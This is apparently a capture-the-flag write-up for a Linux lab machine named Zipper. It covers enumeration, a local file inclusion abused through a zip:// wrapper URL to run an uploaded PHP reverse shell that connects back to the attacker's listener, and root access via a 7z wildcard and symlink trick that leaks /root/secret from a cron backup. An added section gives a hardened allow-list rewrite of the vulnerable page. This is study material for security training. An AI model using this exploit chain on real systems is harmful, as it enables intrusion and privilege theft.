# Zipper

`LFI` `zip` `7z`

* Machine name: Zipper
* Difficulty: Hard
* OS: Linux

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 07:17 EDT
Nmap scan report for 192.168.242.229
Host is up (0.045s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Zipper
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP (80)

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FPqIr0gkp2xrJQ47BP6bq%2F3c683c14c8b4d0b311896fc05e04bd7d.png?alt=media&#x26;token=0788ba0b-5f54-46b3-89dd-87aac0ca6699" alt=""><figcaption></figcaption></figure>

```
┌──(kali㉿kali)-[~]
└─$ dirsearch -u http://192.168.242.229/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.242.229/__24-08-28_07-18-45.txt

Target: http://192.168.242.229/

[07:18:45] Starting: 
[07:18:48] 403 -  280B  - /.ht_wsr.txt
[07:18:48] 403 -  280B  - /.htaccess.bak1
[07:18:48] 403 -  280B  - /.htaccess.orig
[07:18:48] 403 -  280B  - /.htaccess.sample
[07:18:48] 403 -  280B  - /.htaccess.save
[07:18:48] 403 -  280B  - /.htaccess_extra
[07:18:48] 403 -  280B  - /.htaccess_orig
[07:18:48] 403 -  280B  - /.htaccess_sc
[07:18:48] 403 -  280B  - /.htaccessBAK
[07:18:48] 403 -  280B  - /.htaccessOLD2
[07:18:48] 403 -  280B  - /.htaccessOLD
[07:18:48] 403 -  280B  - /.htm
[07:18:48] 403 -  280B  - /.html
[07:18:48] 403 -  280B  - /.httr-oauth
[07:18:48] 403 -  280B  - /.htpasswd_test
[07:18:48] 403 -  280B  - /.htpasswds
[07:18:50] 403 -  280B  - /.php
[07:19:12] 403 -  280B  - /server-status
[07:19:12] 403 -  280B  - /server-status/
[07:19:14] 200 -  145B  - /style
[07:19:16] 200 -    0B  - /upload.php
[07:19:16] 301 -  320B  - /uploads  ->  http://192.168.242.229/uploads/
[07:19:16] 403 -  280B  - /uploads/
```

We found a possible LFI. It will let us read the PHP code behind this page and behind upload.php.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2Fs1pW5Z4jFAebXMjpIJhT%2Fa5ec080579f957b9795582a5c029c974.png?alt=media&#x26;token=8fce1c83-d570-4b4a-8ed9-72451f3351e1" alt=""><figcaption></figcaption></figure>

## Local exploitation

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FYLvVgzkXMnVcwV4wekpX%2F7aaca1853b85aa37191120edd5e0d635.png?alt=media&#x26;token=3f8b5afd-6550-4db0-b01b-46a4c67c0ba1" alt=""><figcaption></figcaption></figure>

```
┌──(kali㉿kali)-[~]
└─$ echo 'PD9waHAKJGZpbGUgPSAkX0dFVFsnZmlsZSddOwppZihpc3NldCgkZmlsZSkpCnsKICAgIGluY2x1ZGUoIiRmaWxlIi4iLnBocCIpOwp9CmVsc2UKewppbmNsdWRlKCJob21lLnBocCIpOwp9Cj8+Cg==' | base64 -d
<?php
$file = $_GET['file'];
if(isset($file))
{
    include("$file".".php");
}
else
{
include("home.php");
}
?>
```

.php is appended every time (we had already noticed this).

Now let's look at upload.php.
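A hardened replacement for the index.php above, added here as an example (it is not the machine's own code or the author's). It assumes the site's pages live in a `pages/` directory and that the page names in the allow-list are the only ones the site serves; the user value is only compared against that list and never concatenated into the include path, so `zip://`, `phar://`, `php://` wrappers and `../` traversal cannot change what gets included.

```php
<?php
// Hardened version of index.php (added example, not the target's code).
declare(strict_types=1);

// Assumptions: page files are stored here and these are the only valid pages.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Map the user-supplied ?file= value to a real page path, or return null.
 * The request value is only ever compared against a fixed allow-list, so
 * stream wrappers (zip://, phar://, php://), traversal (../) and null bytes
 * never reach include().
 */
function resolve_page($requested): ?string
{
    // ?file[]=x yields an array; treat anything that is not a string as empty.
    if (!is_string($requested) || $requested === '') {
        $requested = 'home';
    }
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }

    // Defence in depth: the resolved path must be an existing regular file
    // located inside PAGES_DIR, even though the allow-list already guarantees it.
    $base = realpath(PAGES_DIR);
    $real = realpath(PAGES_DIR . '/' . $requested . '.php');
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$page = resolve_page($_GET['file'] ?? null);
if ($page === null) {
    // Unknown page: fail closed instead of falling back to string concatenation.
    http_response_code(404);
    exit('Page not found');
}
include $page;
```

Requests such as `?file=zip://uploads/upload_1724846919.zip%23pentest` now simply return 404, because the value is not in the allow-list.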

```
┌──(kali㉿kali)-[~]
└─$ echo '[base64 of upload.php, omitted]' | base64 -d
<?php
if ($_FILES && $_FILES['img']) {
    
    if (!empty($_FILES['img']['name'][0])) {
        
        $zip = new ZipArchive();
        $zip_name = getcwd() . "/uploads/upload_" . time() . ".zip";
        
        // Create a zip target
        if ($zip->open($zip_name, ZipArchive::CREATE) !== TRUE) {
            $error .= "Sorry ZIP creation is not working currently.<br/>";
        }
        
        $imageCount = count($_FILES['img']['name']);
        for($i=0;$i<$imageCount;$i++) {
        
            if ($_FILES['img']['tmp_name'][$i] == '') {
                continue;
            }
            $newname = date('YmdHis', time()) . mt_rand() . '.tmp';
            
            // Moving files to zip.
            $zip->addFromString($_FILES['img']['name'][$i], file_get_contents($_FILES['img']['tmp_name'][$i]));
            
            // moving files to the target folder.
            move_uploaded_file($_FILES['img']['tmp_name'][$i], './uploads/' . $newname);
        }
        $zip->close();
        
        // Create HTML Link option to download zip
        $success = basename($zip_name);
    } else {
        $error = '<strong>Error!! </strong> Please select a file.';
    }
}
```

{% embed url="https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/?source=post_page-----b49a52ed8e38--------------------------------" %}

We will upload a zip and then use the LFI to execute a PHP file stored inside it.

* First, upload php-reverse-monkey to the target (here under the name pentest.php)
* Start a listener matching our PHP script
* Execute it; note that we have to drop the .php: `192.168.242.229/index.php?file=zip://uploads/upload_1724846919.zip%23pentest.php`

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.242.229] 46342
Linux zipper 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 12:10:21 up 57 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (963): Inappropriate ioctl for device
bash: no job control in this shell
www-data@zipper:/$ whoami
whoami
www-data
```

## Privilege escalation

```
www-data@zipper:/opt$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *     * * *   root    bash /opt/backup.sh
```

```
www-data@zipper:/opt$ ls -al
ls -al
total 16
drwxr-xr-x  3 root root 4096 Aug 12  2021 .
drwxr-xr-x 20 root root 4096 Aug 12  2021 ..
-rwxr-xr-x  1 root root  153 Aug 12  2021 backup.sh
drwxr-xr-x  2 root root 4096 Aug 28 12:13 backups
www-data@zipper:/opt$ cat backup.sh
cat backup.sh
#!/bin/bash
password=`cat /root/secret`
cd /var/www/html/uploads
rm *.tmp
7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/
```

{% embed url="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks?source=post_page-----b49a52ed8e38--------------------------------#id-7z" %}

The output redirection is already in the script, so after placing the symlink and the `@` list file in the uploads directory we only have to read backup.log.

```
lrwxrwxrwx 1 www-data www-data   12 Aug 12  2021 enox.zip -> /root/secret
-rw-r--r-- 1 www-data www-data    0 Aug 12  2021 @enox.zip
```

```
www-data@zipper:/opt/backups$ cat backup.log
cat backup.log

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor                 (A00F11),ASM,AES-NI)

Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 6686

Scanning the drive:
14 files, 5482 bytes (6 KiB)

Updating archive: /opt/backups/backup.zip

Items to compress: 14


Files read from disk: 14
Archive size: 6686 bytes (7 KiB)

Scan WARNINGS for files and folders:

WildCardsGoingWild : No more files
----------------
Scan WARNINGS: 1
```

The contents of /root/secret end up in the scan warning: `WildCardsGoingWild`

```
www-data@zipper:/opt/backups$ su root
su root
Password: WildCardsGoingWild
whoami
root
```
